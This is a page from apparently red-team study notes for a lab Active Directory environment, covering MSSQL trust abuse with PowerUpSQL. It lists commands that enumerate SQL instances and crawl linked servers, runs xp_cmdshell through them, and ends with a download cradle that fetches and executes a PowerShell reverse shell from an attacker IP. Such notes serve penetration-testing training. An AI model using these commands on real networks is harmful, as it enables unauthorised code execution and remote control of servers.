🖌️
AD-RED-TEAM
  • Active Directory Red Team
  • PowerShell Basics
    • Tips And Tricks
  • I. Active Directory Enumeration
    • User Hunting Domain Enumeration
    • Forest and Domains
    • User Enumeration
    • Groups Enumeration
    • Computers/Server Enumeration
    • Shares Enumeration
    • GP And OU Enumeration
    • ACL Domain Enumeration
    • Trust Domain Enumeration
  • II. Local Privilege Escalation
    • Lateral Movement
    • PowerUp Exploits
  • III. Domain Privilege Escalation
    • Forest Persistence – DCShadow
    • Trust Abuse - MSSQL Servers
    • Priv Esc – Across Forest using krbtgt Ticket
    • Priv Esc - Across Trusts using Trust Tickets
    • Priv Esc – DNSAdmins
    • Priv Esc - Constrained Delegation
    • Priv Esc – Unconstrained Delegation
    • Priv Esc - Targeted Kerberoasting - Set SPN
    • Targeted Kerberoasting - AS-REPs
    • Priv Esc - Kerberoast
  • IV. Domain Persistence and Dominance
    • Persistence ACLs - Security Descriptors
    • Persistence ACLs- Rights Abuse
    • Persistence ACL - AdminSDHolder
    • Persistence – Custom SSP
    • Persistence - DSRM
    • Persistence - Skeleton Key
    • Persistence - Silver Ticket
    • Persistence - Golden Ticket
  • V. Cross Trust Attacks
  • VI. Forest Persistence and Dominance
  • VII. Defenses – Monitoring
  • VIII. Defenses and bypass – Architecture and Work Culture Changes
  • IX. Defenses and Bypass – Deception
  • X. Defenses and Bypass – PowerShell
  • New Server
    • Move Lat-AppLocker
    • Move Lat-Invoke-Command
Powered by GitBook
On this page

Was this helpful?

  1. III. Domain Privilege Escalation

Trust Abuse - MSSQL Servers

PreviousForest Persistence – DCShadowNextPriv Esc – Across Forest using krbtgt Ticket

Last updated 4 years ago

Was this helpful?

  • MS SQL servers are generally deployed in plenty in a Windows domain.

  • SQL Servers provide very good options for lateral movement as domain users can be mapped to database roles

  • For MSSQL and PowerShell hackery, lets use PowerUpSQL

MSSQL Servers

#Discovery (SPN Scanning)
Get-SQLInstanceDomain

#Check Accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

#Gather Information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

#Look for links to remote servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose


#Enumerating Database Links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose


#Executing Commands
Get-SQLServerLinkCrawl -Instance dcorp-mssql "exec master..xp_cmdshell 'whoami'"

#Execute a PowerShell download execute cradle to execute a PowerShell reverse shell:
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http:// 172.16.100.X/Invoke-PowerShellTcp.ps1'')"'
https://github.com/NetSPI/PowerUpSQL